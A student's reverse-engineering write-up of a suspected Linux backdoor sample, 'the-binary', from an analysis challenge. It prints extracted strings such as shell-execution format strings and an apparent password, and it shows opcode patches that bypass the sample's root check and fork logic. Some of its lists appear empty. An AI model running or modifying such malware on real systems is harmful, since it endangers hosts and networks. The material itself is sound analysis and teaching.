Analysis of “the-binary”  

by Albert Bendicho (bendi#at#redestb.es). Student at the "honeyp.edu" university.

Introduction

In this document we’re going to go through the process of reverse engineering an application. The goal of the document is to provide the answers to “The Reverse Challenge” as well as to learn the basics of reverse engineering on the way. This has been my first reverse engineering effort, so I've tried to write the document I would have liked to find to help me with it.

First checks on “the-binary”

Initial steps

The first step is to ensure that we have downloaded “the-binary” provided for the challenge correctly and without alteration by running md5(R*) on it.

  [albert@sandbox reverse-ch]$ md5sum the-binary.tar.gz
  857f9f32cbe7a277710d4fa57670316a  the-binary.tar.gz
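
The same check can be scripted, which is handy when it has to be repeated on several machines. The following is only a sketch using Python's standard hashlib module; the function names are ours and the expected digest is simply the one printed by md5sum above.

```python
import hashlib

# Digest printed by md5sum in the session above.
EXPECTED_MD5 = "857f9f32cbe7a277710d4fa57670316a"

def md5_of_file(path, chunk_size=65536):
    """Return the hexadecimal MD5 digest of the file at `path`."""
    digest = hashlib.md5()
    with open(path, "rb") as handle:
        # Read in chunks so that large archives need not fit in memory.
        for chunk in iter(lambda: handle.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()

def is_unaltered(path, expected=EXPECTED_MD5):
    """True when the file's digest matches the expected one."""
    return md5_of_file(path) == expected.lower()
```

Calling is_unaltered("the-binary.tar.gz") in the download directory would then replace the visual comparison of the two digests.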

After this we’re ready to unpack the file;

  [albert@sandbox reverse-ch]$ tar -xzvf the-binary.tar.gz
  reverse/
  reverse/README.html
  reverse/the-binary

The “file” command

To have an idea of what we’re dealing with we check the kind of file;

[albert@sandbox reverse]$ file the-binary
the-binary: ELF 32-bit LSB executable, Intel 80386, version 1, statically
linked, stripped
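
Most of what “file” reports here comes straight from the first bytes of the ELF header. As an illustration only (it does not detect static linking or stripping, and the lookup tables are deliberately incomplete), a sketch that decodes those bytes could look like this; the function name is ours.

```python
import struct

ELF_CLASS = {1: "32-bit", 2: "64-bit"}
ELF_DATA = {1: "LSB", 2: "MSB"}
ELF_TYPE = {1: "relocatable", 2: "executable", 3: "shared object", 4: "core"}
ELF_MACHINE = {3: "Intel 80386"}  # only the value relevant to this binary

def describe_elf(header):
    """Summarise the first 20 bytes of an ELF file, roughly as file(1) does."""
    if len(header) < 20 or header[:4] != b"\x7fELF":
        raise ValueError("not an ELF header")
    ei_class, ei_data, ei_version = header[4], header[5], header[6]
    # e_type and e_machine follow the 16-byte e_ident array.
    endian = "<" if ei_data == 1 else ">"
    e_type, e_machine = struct.unpack_from(endian + "HH", header, 16)
    return "ELF %s %s %s, %s, version %d" % (
        ELF_CLASS.get(ei_class, "unknown-class"),
        ELF_DATA.get(ei_data, "unknown-order"),
        ELF_TYPE.get(e_type, "unknown-type"),
        ELF_MACHINE.get(e_machine, "unknown-machine"),
        ei_version,
    )
```

It would be used as describe_elf(open("the-binary", "rb").read(20)).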

As expected for this kind of file it’s stripped, but it’s interesting to note that it’s statically linked, which means that it carries all the library functions it uses inside it. This could be done for the following reasons;

As it is an ELF binary, we can try to get more information through “objdump”.

The “objdump” command

The new information we get is this;

[albert@sandbox the-binary]$ objdump -x the-binary

the-binary:     file format elf32-i386
the-binary
architecture: i386, flags 0x00000102:
EXEC_P, D_PAGED
start address 0x08048090

Program Header:
    LOAD off    0x00000000 vaddr 0x08048000 paddr 0x08048000 align 2**12
         filesz 0x00024222 memsz 0x00024222 flags r-x
    LOAD off    0x00024228 vaddr 0x0806d228 paddr 0x0806d228 align 2**12
         filesz 0x0000c094 memsz 0x00011970 flags rw-

Sections:
Idx Name          Size      VMA       LMA       File off  Algn
  0 .init         00000008  08048080  08048080  00000080  2**4
                  CONTENTS, ALLOC, LOAD, READONLY, CODE
  1 .text         0001f53c  08048090  08048090  00000090  2**4
                  CONTENTS, ALLOC, LOAD, READONLY, CODE
  2 __libc_subinit 00000004  080675cc  080675cc  0001f5cc  2**2
                  CONTENTS, ALLOC, LOAD, READONLY, DATA
  3 .fini         00000008  080675d0  080675d0  0001f5d0  2**4
                  CONTENTS, ALLOC, LOAD, READONLY, CODE
  4 .rodata       00004c4a  080675d8  080675d8  0001f5d8  2**2
                  CONTENTS, ALLOC, LOAD, READONLY, DATA
  5 .data         0000c084  0806d228  0806d228  00024228  2**2
                  CONTENTS, ALLOC, LOAD, DATA
  6 .ctors        00000008  080792ac  080792ac  000302ac  2**2
                  CONTENTS, ALLOC, LOAD, DATA
  7 .dtors        00000008  080792b4  080792b4  000302b4  2**2
                  CONTENTS, ALLOC, LOAD, DATA
  8 .bss          000058dc  080792bc  080792bc  000302bc  2**2
                  ALLOC
  9 .note         00000d5c  00000000  00000000  000302bc  2**0
                  CONTENTS, READONLY
 10 .comment      00000ea6  00000000  00000000  00031018  2**0
                  CONTENTS, READONLY
objdump: the-binary: no symbols

The most interesting part is that we have a “__libc_subinit” section, which means that we have a “libc” linked in.

Next, we take a look inside the binary with “strings”

The “strings” command

[albert@sandbox reverse]$ strings the-binary

We get a long set of strings. Looking around we find the following interesting entries;

First Group;

[mingetty]
/tmp/.hj237349
/bin/csh -f -c "%s" 1> %s 2>&1
TfOjG
/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/bin/:.
PATH
HISTFILE
linux
TERM
/bin/sh
/bin/csh -f -c "%s"

All these entries seem quite interesting. First what looks like a faked “process name” for “ps”, next a temporary file name, a format string to execute one command redirecting standard output and standard error, what looks like a password (TfOjG), environment variables for a shell, a shell invocation command and another format string to execute one command, but this time without redirection. These look like they could be the constants of the application.
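
What “strings” does can be approximated in a few lines, which is useful when the binary has to be inspected on a box without binutils. This is a rough sketch, not a replacement for the real tool: it only looks for runs of printable ASCII of a minimum length, and the function name is ours.

```python
import re

def ascii_strings(data, min_len=4):
    """Return the runs of printable ASCII characters found in `data`."""
    # Printable ASCII is 0x20 (space) to 0x7e (~); keep runs of min_len or more.
    pattern = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    return [match.group().decode("ascii") for match in pattern.finditer(data)]
```

Running ascii_strings(open("the-binary", "rb").read()) should give a list comparable to the one we inspected by hand.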

Second group;

The second group comes immediately after the first, and also seems to be a group of constants. Some of them as a sample;

RESOLV_SERV_ORDER
RESOLV_SPOOF_CHECK
warn
warn off
RESOLV_MULTI
RESOLV_REORDER
RESOLV_ADD_TRIM_DOMAINS
RESOLV_OVERRIDE_TRIM_DOMAINS
gethostby*.getanswer: asked for "%s", got CNAME for "%s"
gethostby*.getanswer: asked for type %d(%s), got %d(%s)    

They seem to be DNS related, so perhaps the resolv library is linked, but a “strings” on our resolv library doesn’t seem to match. We check with;

[albert@sandbox reverse]$ strings /usr/lib/libresolv.a| grep RESOLV_OVERRIDE_TRIM_DOMAINS
[albert@sandbox reverse]$

No output, so it really seems that we missed this one. We’ll try to find which library it belongs to;

[albert@sandbox reverse]$ find /usr/lib -name "*.a" -exec grep RESOLV_OVERRIDE_TRIM_DOMAINS {} \;
Binary file /usr/lib/libc.a matches
[albert@sandbox reverse]$

So it seems we found the library it belongs to; “libc”. On the other hand it was normal to expect this library to be there, as it is the most basic one and we had already spotted it with “objdump”.
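
The “find ... -exec grep” search above can also be written as a small helper. This is just a sketch with names of our own choosing; it reads each archive fully into memory, which is fine for static libraries of this size.

```python
import os

def files_containing(root, needle, suffix=".a"):
    """List the files under `root` ending in `suffix` that contain `needle`."""
    matches = []
    for directory, _subdirs, names in os.walk(root):
        for name in sorted(names):
            if not name.endswith(suffix):
                continue
            path = os.path.join(directory, name)
            try:
                with open(path, "rb") as handle:
                    if needle in handle.read():
                        matches.append(path)
            except OSError:
                # Unreadable files are skipped rather than aborting the search.
                continue
    return matches
```

For the search above the call would be files_containing("/usr/lib", b"RESOLV_OVERRIDE_TRIM_DOMAINS").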

Third group;

This seemed to be another group at first, as there was quite a lot of “garbage” and the next string found was not related to DNS, but after the analysis on the second group, we see that the string “@(#) The Linux C library 5.3.12” clearly defines what “libc” version we’re dealing with.

A little research through “rpmfind.net” allows us to see that this library is the one distributed by default with “RedHat 6.2”. So perhaps “the-binary” was compiled in this platform.

This also gives us a hint on the process we’re following. We’re looking for strings in a different library (we’re using RedHat 7.1, with a different LibC version), so it is possible that some strings don’t match. To avoid this we download the sources for “The Linux C library 5.3.12” and search for the strings there.

While still checking strings we come with a really special one;

*nazgul*

Nazgul is the name of a kind of “Dark Spirit” in the novel “The Lord of the Rings”. Appropriate name for a hacking thing. But doing our check on the LibC Sources

[albert@sandbox albert]$ grep -Hr \*nazgul\* /usr/src/redhat/SOURCES/libc/*
/usr/src/redhat/SOURCES/libc/nls/msgcat.h:#define MCMagic              "*nazgul*"
/usr/src/redhat/SOURCES/libc/nls/msgcat.h:   char      magic[MCMagicLen];     /* Magic cookie "*nazgul*" */
[albert@sandbox albert]$

we find out (surprisingly) that it’s part of it!! That reminds us of something; always check your assumptions. They can be wrong!!

We keep looking and don’t notice anything suspicious or that doesn’t match our LibC 5.3.12 source files. So our research through “strings” is done.

Our next step will be to start with the disassembly and execution of the application, but for that we have to set up a proper environment. The binary we want to execute could be malicious.

  

Preparing an execution environment

It would be good to set up an environment with VMWare as described in (R*), but we don’t have a VMWare license. So we’ll go with what we have; 2 PCs. On one of them we run Win98, on the other Linux 7.1 (a 6.2 would have been better, as it is the one that comes with LibC 5.3.12, or Linux 7.3, the most current, but we only have 7.1 at hand).

We connect them with a crossed ethernet cable and configure them on a private network. The Linux box with IP 192.168.1.1 and the Win98 with IP 192.168.1.7.

On the Win98 box we install;

On the Linux box we install;

We configure the Linux box in a way that it sends ALL the network traffic to the Win98 box. We do it configuring 2 things;

We will try to execute the application as a non-privileged user, as we don't know what kind of action this application can take. So we create a user for running this application and we'll check with Tripwire from time to time to ensure that our system hasn't been affected in any way.

First run of “the-binary” with fenris

Now we have our environment ready, so we'll try to execute the binary.

Our first run of "the-binary" will be with fenris so we can see what happens. The fenris distribution we use comes with a set of signatures from a "libc5" library. That will come in handy to analyze our binary, as the system we use has a "libc6" library but, as we've seen, "the-binary" comes with a "libc5" library.

Before running "the-binary" we start our sniffer on the Win98 box. Then we go with our first run of "the-binary";

[tstusr@sandbox reverse]$ ../fenris/fenris ./the-binary
fenris 0.04b (2699, 22396) - program execution path analysis tool
Brought to you by Michal Zalewski <lcamtuf@coredump.cx>
* WARNING: cannot load 'fnprints.dat' fingerprints database.
+++ Executing './the-binary' (pid 25725, static) +++
25725:-- SYS exit (-1) = ???
+++ Process 25725 exited with code 255 +++
************************************************************
* Hmm, call me suspicious. I tried to skip libc prolog for *
* this application, but it seems to me I skipped way too   *
* much. Maybe this program is too smart for me? Maybe it   *
* was compiled in some exotic place? Consider using -s     *
* option for now, and contact my author!                   *
************************************************************
>> Exit condition: no more processes to trace
    

OK, so we do as the application suggests and use "-s", which according to the documentation "disables automatic prolog detection", so that all the libc initialization is traced as well. We have no problem with that. So here we go;

[tstusr@sandbox reverse]$  ../fenris/fenris -s -L ../fenris/support/fn-libc5.dat ./the-binary 
fenris 0.02b (2334, 22396) - program execution path analysis tool
Brought to you by Michal Zalewski <lcamtuf@coredump.cx>
<CONTINUES, Snipped for brevity>

We get a not-so-long output that we inspect visually. It seems that the application has exited. Before looking through the output we check our sniffer and see no relevant activity. We also ensure with "tripwire" that everything is OK. Then we take a look through the output and we see the following;

14719:01  local fnct_8 ()
14719:01  + fnct_8 = 0x8048134
14719:01  # No matches for signature CD18AE48.
14719:02   local fnct_9 (0, 0, 0)
14719:02   + fnct_9 = 0x805720c
14719:02   # Matches for signature 5527EA2B: geteuid libc_geteuid 
14719:03    SYS geteuid () = 503
14719:03    <805721a> cndt: if-above block (signed) +16 executed
14719:02   ...return from function = <void>
14719:02   <8048182> cndt: conditional block +8 executed
14719:02   local fnct_10 (-1)
14719:02   + fnct_10 = 0x8055fbc
14719:02   # No matches for signature 09B18AA8.

There's a call to a "local fnct_10 (-1)", which seems to be the "beginning of the end", as a "-1" value usually means an error. We see that the previous call was a call to "geteuid" that returns 503, the UID of tstusr. So it seems that if "the-binary" is not run by root it detects it and stops execution.
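
The "-1" seen here and the "exited with code 255" reported by fenris on the first run are the same value: only the low 8 bits of the argument given to exit reach the parent process. A one-line sketch of that arithmetic (the function name is ours):

```python
def exit_status(value):
    """Exit code seen by the parent: the low 8 bits of the value passed to exit."""
    return value & 0xFF

print(exit_status(-1))  # prints 255
```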

We could run it as root, but that's not advisable at all as we still don't know much about the functionality of "the-binary". So the other solution is to patch the program so we can skip this check.

To do that we need to disassemble "the-binary" and look where to modify the code. For that purpose we disassemble "the-binary" with IdaFree.

Disassembling “the-binary”

Once in IdaFree we load "the-binary" which we have first copied into a directory on the Win98 box.

This gives us a nice disassembly of "the-binary". In the previous execution of fenris we've seen that the call to geteuid (fnct_9) was made from "fnct_8", which starts at position 0x8048134, so we go to the routine at that position and look for a call to the routine at position 0x805720c (fnct_9). We find it easily. The code is;

.text:0804816B                 mov     [ebp+var_44D8], edx
.text:08048171                 mov     [ebp+var_44C4], 10h
.text:0804817B                 call    sub_0_805720C
.text:08048180                 test    eax, eax
.text:08048182                 jz      short loc_0_804818C
.text:08048184                 push    0FFFFFFFFh
.text:08048186                 call    sub_0_8055FBC
.text:0804818B                 nop
    

Using the information we got from our fenris execution we can make this more readable by using IdaFree to rename the functions we have identified so far. These are sub_0_805720C, which fenris matched as "geteuid", and sub_0_8055FBC, which we name "error_exit".

After  renaming these 2 functions we get;

.text:0804816B                 mov     [ebp+var_44D8], edx
.text:08048171                 mov     [ebp+var_44C4], 10h
.text:0804817B                 call    geteuid
.text:08048180                 test    eax, eax
.text:08048182                 jz      short loc_0_804818C
.text:08048184                 push    0FFFFFFFFh
.text:08048186                 call    error_exit
.text:0804818B                 nop

That's more understandable than before. Now we can see that the "jz short loc_0_804818C" jump is taken for root (geteuid returns 0). We can simply invert that condition by changing the "jz" into a "jnz". Looking at the Intel reference we find that we have to replace the value 0x74 at position 0x08048182 (opcode for a short "jz") with 0x75 (opcode for a short "jnz").

So now that we know what we want to achieve it's time to patch "the-binary".

Patching “the-binary”  

We could use the "-P" option of fenris to patch "on-the-fly" the binary. That would be;

[tstusr@sandbox reverse]$  ../fenris/fenris -s -L ../fenris/support/fn-libc5.dat -P 0x8048182:0x75 ./the-binary 

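But later on we will also want to inspect it with "gdb". There the way to patch it is with the "set" command, writing a single byte so that the jump offset stored right after the opcode is left untouched;

gdb> set {unsigned char}0x8048182 = 0x75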

It's also foreseeable that we will end up with more patches than this one, so it's better to have a patched binary. Looking around we find that xxd (part of the vim package) has the ability to patch binaries in a convenient way. First we have to find out what position in the binary file corresponds later on to 0x8048182. 

We can check this visually using IdaFree and its "Options\ Dump/Normal view" or by pressing F4. This gives us a dump so we can see where our "0x74" is. With xxd we obtain a pretty much identical kind of dump and we can easily spot the point by comparing visually. We have to modify the byte at position 0000182. This agrees with the "objdump" output, where the first LOAD segment maps file offset 0 to address 0x08048000. That gives us the path to follow in further modifications; we have to subtract 0x8048000 from the memory location to get the file offset to modify.
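
The subtraction can be double-checked against the program headers printed by "objdump" earlier. The sketch below hard-codes the two LOAD segments from that output (file offset, virtual address, size in file); the function name is ours.

```python
# (file offset, virtual address, size in file) of each LOAD segment,
# copied from the "Program Header" part of the objdump output.
LOAD_SEGMENTS = [
    (0x00000000, 0x08048000, 0x00024222),  # r-x, holds .text
    (0x00024228, 0x0806D228, 0x0000C094),  # rw-, holds .data
]

def vaddr_to_offset(vaddr, segments=LOAD_SEGMENTS):
    """Translate a virtual address into an offset inside the file."""
    for file_off, seg_vaddr, file_size in segments:
        if seg_vaddr <= vaddr < seg_vaddr + file_size:
            return vaddr - seg_vaddr + file_off
    raise ValueError("address 0x%08x is not backed by the file" % vaddr)

print(hex(vaddr_to_offset(0x08048182)))  # prints 0x182
```

For any address in the code segment this reduces to subtracting 0x8048000, which is the rule we use by hand.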

So we prepare a patched binary with the following commands;

[tstusr@sandbox reverse]$ cp the-binary the-binary-NOROOT
[tstusr@sandbox reverse]$ echo '0000182: 75' | xxd -r - the-binary-NOROOT 

Now we have a clear way to patch "the-binary". Because we will apply more than one patch and we might try to patch different parts, we can set up a simple script that patches all the parts. So we write a script as;

#!/bin/sh
if [ -z "$1" ] ; then echo "Output filename missing"; exit 1; fi
cp the-binary "$1"
 
# Run without being root
echo '0000182: 75' | xxd -r - "$1"

A complete script with all "developed" patches is given in the extra files that come with this analysis.

Cycling through the "execution/disassembly/patch" cycle

Our goal is to check the activity that "the-binary" produces. For that we keep using fenris. That will bring us to a cycle of execution, disassembly and patching.

So we're going to discuss the problems found and how to get around them without the detail of how to perform each step.

Problem with "fork".

The next execution of fenris 

[tstusr@sandbox reverse]$ ../fenris/fenris -s -L ../fenris/support/fn-libc5.dat ./the-binary-NOROOT

generates a longer output where we find;

14836:02   local fnct_13 ()
14836:02   + fnct_13 = 0x80571e8
14836:02   # Matches for signature BCF79788: fork libc_fork vfork 
14836:03    SYS fork () = 14837
14836:-- SIGNAL 17 (Child exited) - will not be handled
14836:03    <80571f6> cndt: if-above block (signed) +16 executed
14836:02   ...return from function = <void>
14836:02   <80481df> cndt: conditional block +7 executed
14836:02   local fnct_14 (0)
14836:02   + fnct_14 = 0x8055fbc
14836:02   # No matches for signature 09B18AA8.

So there's a fork(), and looking on how things go, we see that the application calls the function at 0x8055fbc which we know is the one that we named "error_exit" before. 

So it seems that the "interesting" work gets done by the child process of the fork().

Looking at the fenris documentation (README file) we see that we have an option to trace child processes; "-f". So we try again;

[tstusr@sandbox reverse]$ ../fenris/fenris -f -s -L ../fenris/support/fn-libc5.dat ./the-binary-NOROOT

with the following outcome;

14850:03    fork () = 14851
>> OS error       : Operation not permitted [1]
>> Error condition: PTRACE_ATTACH failed
>> This condition occoured while tracing pid 14850 (eip 80571f0).
>> Traced 293 user CPU cycles (0 libcalls, 13 fncalls, 4 syscalls).
 
**************************************************
* If you believe this is because of programming  *
* error, please report above message, along with *
* information about your working environment and *
* traced application, to the author of this      *
* utility (e-mail: lcamtuf@coredump.cx). Thanks! *
**************************************************

Again, no luck. As the documentation states, "-f" might have some problems, and they're affecting us.

So we take another approach; if we want to follow the child process, just change the code that makes it jump one way or another. In this case we have to change another "jz" for another "jnz" at position 0x080481df.

We apply the patch and try again.

We get the same outcome, with another fork() call. So we repeat our process and move on. This leads to a file patched with;

#!/bin/sh
if [ -z "$1" ] ; then echo "Output filename missing"; exit 1; fi
cp the-binary "$1"

# Run without being root
echo '0000182: 75' | xxd -r - "$1"

# Switch behaviour of parent and child on first fork
echo '00001DF: 75' | xxd -r - "$1"

# Switch behaviour of parent and child on second fork
echo '0000200: 75' | xxd -r - "$1"
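
A variation on this script that refuses to patch when the byte found is not the one we expect can save some confusion if an offset is mistyped. The sketch below is ours and makes one assumption that should be checked against the disassembly: that all three patched bytes are short "jz" opcodes (0x74), as the text states for the first two.

```python
JZ_SHORT, JNZ_SHORT = 0x74, 0x75

# File offsets taken from the shell script above.
PATCHES = [
    (0x182, "run without being root"),
    (0x1DF, "switch parent and child on first fork"),
    (0x200, "switch parent and child on second fork"),
]

def apply_patches(src, dst, patches=PATCHES, old=JZ_SHORT, new=JNZ_SHORT):
    """Copy `src` to `dst`, replacing `old` with `new` at every patch offset."""
    with open(src, "rb") as handle:
        image = bytearray(handle.read())
    for offset, reason in patches:
        # Assumption: every patched byte is a short jz; stop if it is not.
        if image[offset] != old:
            raise ValueError("offset 0x%x holds 0x%02x, not 0x%02x (%s)"
                             % (offset, image[offset], old, reason))
        image[offset] = new
    with open(dst, "wb") as handle:
        handle.write(image)
```

It would be called as apply_patches("the-binary", "the-binary-NOROOT-NOFORK1-NOFORK2"); the original file is never modified.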

When we run the patched binary again with fenris we get a large amount of output, so we'd better use the "-o" option of fenris to write all this output to a file.

[tstusr@sandbox reverse]$ ../fenris/fenris -s -L ../fenris/support/fn-libc5.dat -o fenris.out \
> ./the-binary-NOROOT-NOFORK1-NOFORK2 

Fenris doesn't stop, so we stop it after about 10 seconds of execution.

Problem with "socket" and "socketcall_10"

Reading fenris.out is a hard task but we can still find some things. We can see a lot of repetition in what seem to be two different loops. But looking between the two main "repetition groups" we find the following;

14897:02   local fnct_20 (2, 3, 11)
14897:02   + fnct_20 = 0x8056cf4
14897:02   # No matches for signature 93D3112B.
14897:03    SYS socket (PF_INET, SOCK_RAW, 11 [nvp]) = -1 (Operation not permitted)
14897:03    <8056d22> cndt: if-above block (signed) +13 executed
14897:02   ...return from function = <void>
14897:02   // function has accessed non-local memory:

So it seems that "the-binary" is trying to open a RAW socket. It obviously can't because only root can do that. Later, in the second "repetition" group, we see a lot of;

14897:02   local fnct_21 (-1, l/bffff334, 2048, 0)
14897:02   + l/bffff334 (maxsize 2060) = stack of fcnt_8 (0 down)
14897:02   # No matches for signature 16E2ECD3.
14897:03    SYS socketcall_10 (0xbfffb610 <invalid>) = -9 (Bad file descriptor)
14897:03    <8056b78> cndt: if-above block (signed) +13 executed

So it seems that we're trying to do some kind of socketcall with a bad file descriptor. Probably the one we haven't been able to open on the previous "socket" operation.

It's quite obvious that moving through this output would be too hard, so it's time to do some analysis on the disassembly of "the-binary".

Identifying functions in "the-binary"

We can see that IdaFree has identified a large number of functions. We can be pretty sure that most of them are library functions, but which ones?

Obviously it would be nice to recognize as much of the library functions as possible. We have several ways to achieve this;

Without doubt the first two options are the most appropriate (FLIRT or Dress, both signature based). But the third one also comes in handy to reinforce the output generated by these options (at least dress, as we haven't tried FLIRT).

The reason for the reinforcement comes from the fact that several functions have identical signatures, for example getsockopt and setsockopt. Dress can't tell which one is which. With our third option (manual recognition of "INT 80h" calls) we can clearly tell one from the other.
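
For the socket functions the manual recognition is particularly simple. On Linux/i386 all of them go through one system call, socketcall (number 102), and the sub-function is selected by a small integer. The table below reproduces the numbers defined in the kernel's linux/net.h; the helper name is ours. It also explains the "socketcall_10" reported by fenris, which is "recv".

```python
# Sub-function numbers of the socketcall system call (linux/net.h).
SOCKETCALL = {
    1: "socket", 2: "bind", 3: "connect", 4: "listen", 5: "accept",
    6: "getsockname", 7: "getpeername", 8: "socketpair", 9: "send",
    10: "recv", 11: "sendto", 12: "recvfrom", 13: "shutdown",
    14: "setsockopt", 15: "getsockopt", 16: "sendmsg", 17: "recvmsg",
}

def socketcall_name(number):
    """Name of the socket function selected by a socketcall sub-function number."""
    return SOCKETCALL.get(number, "unknown")

print(socketcall_name(10))  # prints recv
```

Two wrappers with identical code shape, such as getsockopt and setsockopt, differ only in this number, so reading it in the disassembly settles which one is which.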

So as the next step we "dress" "the-binary".

[tstusr@sandbox reverse]$ ../fenris/dress -F ../fenris/support/fn-libc5.dat the-binary the-binary-dressed
dress - stripped static binary recovery tool by <lcamtuf@coredump.cx>
* WARNING: cannot load 'fnprints.dat' fingerprints database.
[+] Loaded 5400 fingerprints...
[*] Code section at 0x08048090 - 0x080675cc, offset 144 in the file.
[*] For your initial breakpoint, use *0x8048090
[+] Locating CALLs... 371 found.
[+] Matching fingerprints...
[*] Writing new ELF file:
[+] Cloning general ELF data...
[+] Setting up sections: .init .text .fini .rodata .data .ctors .dtors .bss .note .comment 
[+] Preparing new symbol tables...
[+] Copying all sections: .init .text .fini .rodata .data .ctors .dtors .bss .note .comment 
[+] All set. Detected fingerprints for 209 of 371 functions.

(Note: the WARNING message is because we're not executing dress from the fenris directory or providing the path to fnprints.dat, but that's not a problem since we only want the fingerprints of the functions on libc5 to be used).

Now we take "the-binary-dressed" to IDA and watch the new output. That looks completely different than before!

If we look at the list of functions (menu "View/Functions") we'll see that we got a lot of the library functions identified. Even then, we still have some confusion with "recvfrom___sendto" and "recvfrom___sendto_0" among others. If we need to clarify any of these confusions we can try with the third method described before. In the specific case of the "recvfrom___sendto" and "recvfrom___sendto_0" it resolves the doubt immediately.

But the third method also comes handy to identify some functions not identified by dress, like for example;

and some others (less useful) like "wait4" and "brk".

So the third method proves to be really useful for reaching some points where the "fingerprint recognizers" fail.

Now we're ready to navigate through the code more easily and try to understand what happens.

Identifying variables in the functions.

We have seen that the places where we've had to patch the binary so far were all in the same function. So we'll start by looking at this function.

Here we have to be really patient and persistent to start getting all the information out of the disassembly. This is quite an intuitive task, but we can make progress with some "semi-automatic" recognition of variables (both global and local).

To do that we will rename some variables so we can tell what type they are. We'll look at the library calls, look at the type of their parameters and then name the variable pushed on the stack accordingly. For that we'll sometimes have to track the assignment of some registers, as they are pushed on the stack but were assigned a value long before.

We can also see, especially at the beginning of this function, that some variables are used to point to others, so we know they will be pointers.

Another thing we can do to "organize" the variables is to define structures for the things we recognize. 

We'll take as an example the first call to "recv" at position ".text:080482C5" (in fact it's not a random example, as we get quite a lot of information from this one).

Initially we have;

push    0
push    800h
lea     eax, [ebp+var_800]
push    eax
mov     ecx, [ebp+var_44C8]
push    ecx
call    recv
mov     esi, eax

This translates to "C" as;

"register esi" = recv ( var_44C8, &var_800, 800h, 0);

We see in the libc5 sources that "recv" has the following prototype;

int recv (int __sockfd, void *__buff, size_t __len, unsigned int __flags);

So now we know that var_44C8 is a socket file descriptor and that var_800 is an array at least 2048 (800h) bytes long.

But we can push it even further. As the socket is a raw one, we know that this "recv" call will receive an IP packet in its buffer, so we know what structure the "var_800" buffer will hold!

So we define this structure (basically) by using IdaFree's structure definition interface.

We go to "View/Structure" and insert the following structures;

0000 iphdr           struc ; (sizeof=0x14)
0000 ihl_version     db ?
0001 TOS             db ?
0002 len             dw ?
0004 id              dw ?
0006 frag_off        dw ?
0008 TTL             db ?
0009 protocol        db ?
000A crc             dw ?
000C saddr           dd ?
0010 daddr           dd ?
0014 iphdr           ends
0014
0000 ; -------------------------------------
0000
0000 rawIPpacket     struc ; (sizeof=0x800)
0000 hdr             iphdr ?
0014 data            db 2028 dup(?)
0800 rawIPpacket     ends
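
To convince ourselves that the offsets are right, the same layout can be written down with Python's struct module and tried on a captured or hand-made packet. This is only a sketch: the field names are the ones we chose for the IdaFree structure, the addresses are kept as 4 raw bytes, and like the structure above it ignores IP options.

```python
import struct
from collections import namedtuple

# Network byte order; B = 1 byte, H = 2 bytes, 4s = 4 raw bytes.
IPHDR_FORMAT = "!BBHHHBBH4s4s"
IPHDR_SIZE = struct.calcsize(IPHDR_FORMAT)  # 20 bytes, the 0x14 of the listing

IpHdr = namedtuple(
    "IpHdr",
    "ihl_version TOS len id frag_off TTL protocol crc saddr daddr",
)

def split_raw_packet(buf):
    """Split a raw IP packet into (header fields, data), as rawIPpacket does."""
    if len(buf) < IPHDR_SIZE:
        raise ValueError("packet shorter than an IP header")
    hdr = IpHdr._make(struct.unpack_from(IPHDR_FORMAT, buf, 0))
    return hdr, buf[IPHDR_SIZE:]
```

The 2028 bytes of the "data" member are simply what is left of the 2048-byte buffer after the 20-byte header.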

Then we go to where the "var_800" variable is defined (the fastest way is to put the cursor on top of a "var_800" reference in the code we're looking at and hit enter) and declare it as having the structure "rawIPpacket". For IdaFree to allow this we first have to undeclare (with the "u" key) all the variables from var_7FF to var_7EA; then we will be able to go to "var_800", select "Edit/Struct/Declare struct var..." and select our "rawIPpacket" structure.

After recognizing more variables this way, we get quite a change on our variable names;

From this                        To this
var_44F0 = dword ptr -44F0h      var_RandomValue?= dword ptr -44F0h
var_44EC = dword ptr -44ECh      var_0Value? = dword ptr -44ECh
var_44E8 = dword ptr -44E8h      var_3rdBufferPtr= dword ptr -44E8h
var_44E4 = dword ptr -44E4h      var_AddrPtr = dword ptr -44E4h
var_44E0 = dword ptr -44E0h      var_2ndBufPtr = dword ptr -44E0h
var_44DC = dword ptr -44DCh      var_tmpFD = dword ptr -44DCh
var_44D8 = dword ptr -44D8h      var_BufDat2Ptr = dword ptr -44D8h
var_44D4 = dword ptr -44D4h      var_BufDatPtr = dword ptr -44D4h
var_44D0 = dword ptr -44D0h      var_BuffPtr = dword ptr -44D0h
var_44CC = dword ptr -44CCh      var_acceptFD = dword ptr -44CCh
var_44C8 = dword ptr -44C8h      var_mainSD = dword ptr -44C8h
var_44C4 = dword ptr -44C4h      var_AcceptAddrLen= dword ptr -44C4h
var_44C0 = dword ptr -44C0h      var_setsockopt_optval= dword ptr -44C0h
var_44BC = byte ptr -44BCh       var_Buf256Bytes = byte ptr -44BCh
var_43BC = byte ptr -43BCh       var_TCPRecvBuf = byte ptr -43BCh
var_11D8 = byte ptr -11D8h       var_AcceptAddr = byte ptr -11D8h
var_11C8 = word ptr -11C8h       var_bindSockAddr= sockaddr_in ptr -11C8h
var_11C6 = word ptr -11C6h
var_11C4 = dword ptr -11C4h
var_11B8 = byte ptr -11B8h       var_Addr = byte ptr -11B8h
var_1190 = byte ptr -1190h       var_3rdBuffer = byte ptr -1190h
var_1000 = byte ptr -1000h       var_2ndBuf = byte ptr -1000h
var_FFF = byte ptr -0FFFh
var_FFE = byte ptr -0FFEh
var_FFD = byte ptr -0FFDh
var_FFC = byte ptr -0FFCh
var_FFB = byte ptr -0FFBh
var_FFA = byte ptr -0FFAh
var_FF9 = byte ptr -0FF9h
var_FF8 = byte ptr -0FF8h
var_FF7 = byte ptr -0FF7h
var_FF6 = byte ptr -0FF6h
var_FF5 = byte ptr -0FF5h
var_FF4 = byte ptr -0FF4h
var_FF3 = byte ptr -0FF3h
var_FF2 = byte ptr -0FF2h
var_800 = byte ptr -800h         var_Buf = rawIPpacket ptr -800h
var_7FF = byte ptr -7FFh
var_7FE = byte ptr -7FEh
var_7FD = byte ptr -7FDh
var_7FC = byte ptr -7FCh
var_7F0 = byte ptr -7F0h
var_7EF = byte ptr -7EFh
var_7EE = byte ptr -7EEh
var_7ED = byte ptr -7EDh
var_7EC = byte ptr -7ECh
var_7EA = byte ptr -7EAh
arg_4 = dword ptr 0Ch

This will enormously simplify the reading of the code.

We can also change some global variable names this way. Here we can count on extra help from IdaFree, which gives us a "view/Cross reference" option to identify where and how every variable is accessed.

Our final result for the uninitialized variables (.bss segment) is;

.bss:0807E770*gPID            dd ?
